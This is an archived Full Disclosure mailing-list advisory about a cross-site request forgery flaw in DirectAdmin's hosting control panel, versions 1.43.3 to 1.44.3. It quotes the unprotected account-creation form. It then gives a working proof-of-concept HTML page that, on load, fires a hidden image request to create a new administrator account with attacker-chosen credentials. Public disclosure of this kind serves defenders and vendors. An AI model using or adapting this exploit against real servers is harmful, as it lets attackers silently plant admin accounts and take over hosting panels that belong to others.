[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] DirectAdmin (1.44.3) CSRF Vulnerability



<div><p># Title : DirectAdmin (1.44.3) CSRF Vulnerability <br /># Date : 
10-10-2015<br /># Version : 1.43.3-1.44.3<br /># Author : @babayarisi 
http://ha.cker.io<br /># Vendor : http://www.directadmin.com/<br /># Download: 
http://www.directadmin.com/demo.html<br 
/>=============================================================================<br
 /># info : DirectAdmin is a web-based hosting control panel.</p><p>#As you can 
see original form doesn't include csrf protection or any secret token.<br 
/>&lt;form name=reseller action="CMD_ACCOUNT_ADMIN" method="post" 
onSubmit="return formOK()"&gt;<br />&lt;input type=hidden name=action 
value=create&gt;<br />&lt;tr&gt;&lt;td 
class="list"&gt;Username:&lt;/td&gt;&lt;td class="list"&gt;&lt;input type=text 
name=username maxlength=12 onChange="checkName()"&gt;&lt;/td&gt;&lt;/tr&gt;<br 
/>&lt;tr&gt;&lt;td class="list"&gt;E-Mail:&lt;/td&gt;&lt;td 
class="list"&gt;&lt;input type=text name=email 
onChange="checkEmail()"&gt;&lt;/td&gt;&lt;/tr&gt;<br />&lt;tr&gt;&lt;td 
class="list"&gt;Enter Password:&lt;/td&gt;&lt;td class="list"&gt;&lt;input 
type=password name=passwd&gt; &lt;input type=button value="Random" 
onClick="randomPass()"&gt;&lt;/td&gt;&lt;/tr&gt;<br />&lt;tr&gt;&lt;td 
class="list"&gt;Re-Enter Password:&lt;/td&gt;&lt;td class="list"&gt;&lt;input 
type=password name=passwd2 onChange="checkPass()"&gt;&lt;/td&gt;&lt;/tr&gt;<br 
/>&lt;tr&gt;&lt;td class="list"&gt;Send Email Notification:&lt;/td&gt;&lt;td 
class="list"&gt;&lt;input type=checkbox value="yes" name=notify checked&gt; 
&lt;a href="javascript:showAdminMessage();"&gt;Edit Admin 
Message&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;</p><p>&lt;tr&gt;&lt;td td 
class="listtitle" colspan=3 align=right&gt;<br />&lt;input type=submit 
value="Submit"&gt;<br />&lt;/td&gt;&lt;/tr&gt;<br />&lt;/form&gt;</p><p>#POC<br 
/>&lt;html&gt;<br />&lt;head&gt;<br />&lt;title&gt;POC&lt;/title&gt;<br 
/>&lt;/head&gt;<br />&lt;script language="javascript"&gt;</p><p>function 
yurudi(){<br />var adress ="www.demo.com";<br />var username="demo";<br />var 
email ="demo@xxxxxxxx";<br />var password="12345";<br />var 
urlson="https://"+adress+":2222/CMD_ACCOUNT_ADMIN?action=create&amp;username="+username+"&amp;email="+email+"&amp;passwd="+password+"&amp;passwd2="+password;</p><p>document.getElementById("resim").src=urlson;<br
 />}<br />&lt;/script&gt;</p><p>&lt;body onload="yurudi()"&gt;<br />&lt;img 
id="resim" src="" style="height:0px;width:0px;"&gt;&lt;/img&gt;<br 
/>&lt;/body&gt;<br />&lt;/html&gt;<br />#POC</p><p># don't be evil!</p></div>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/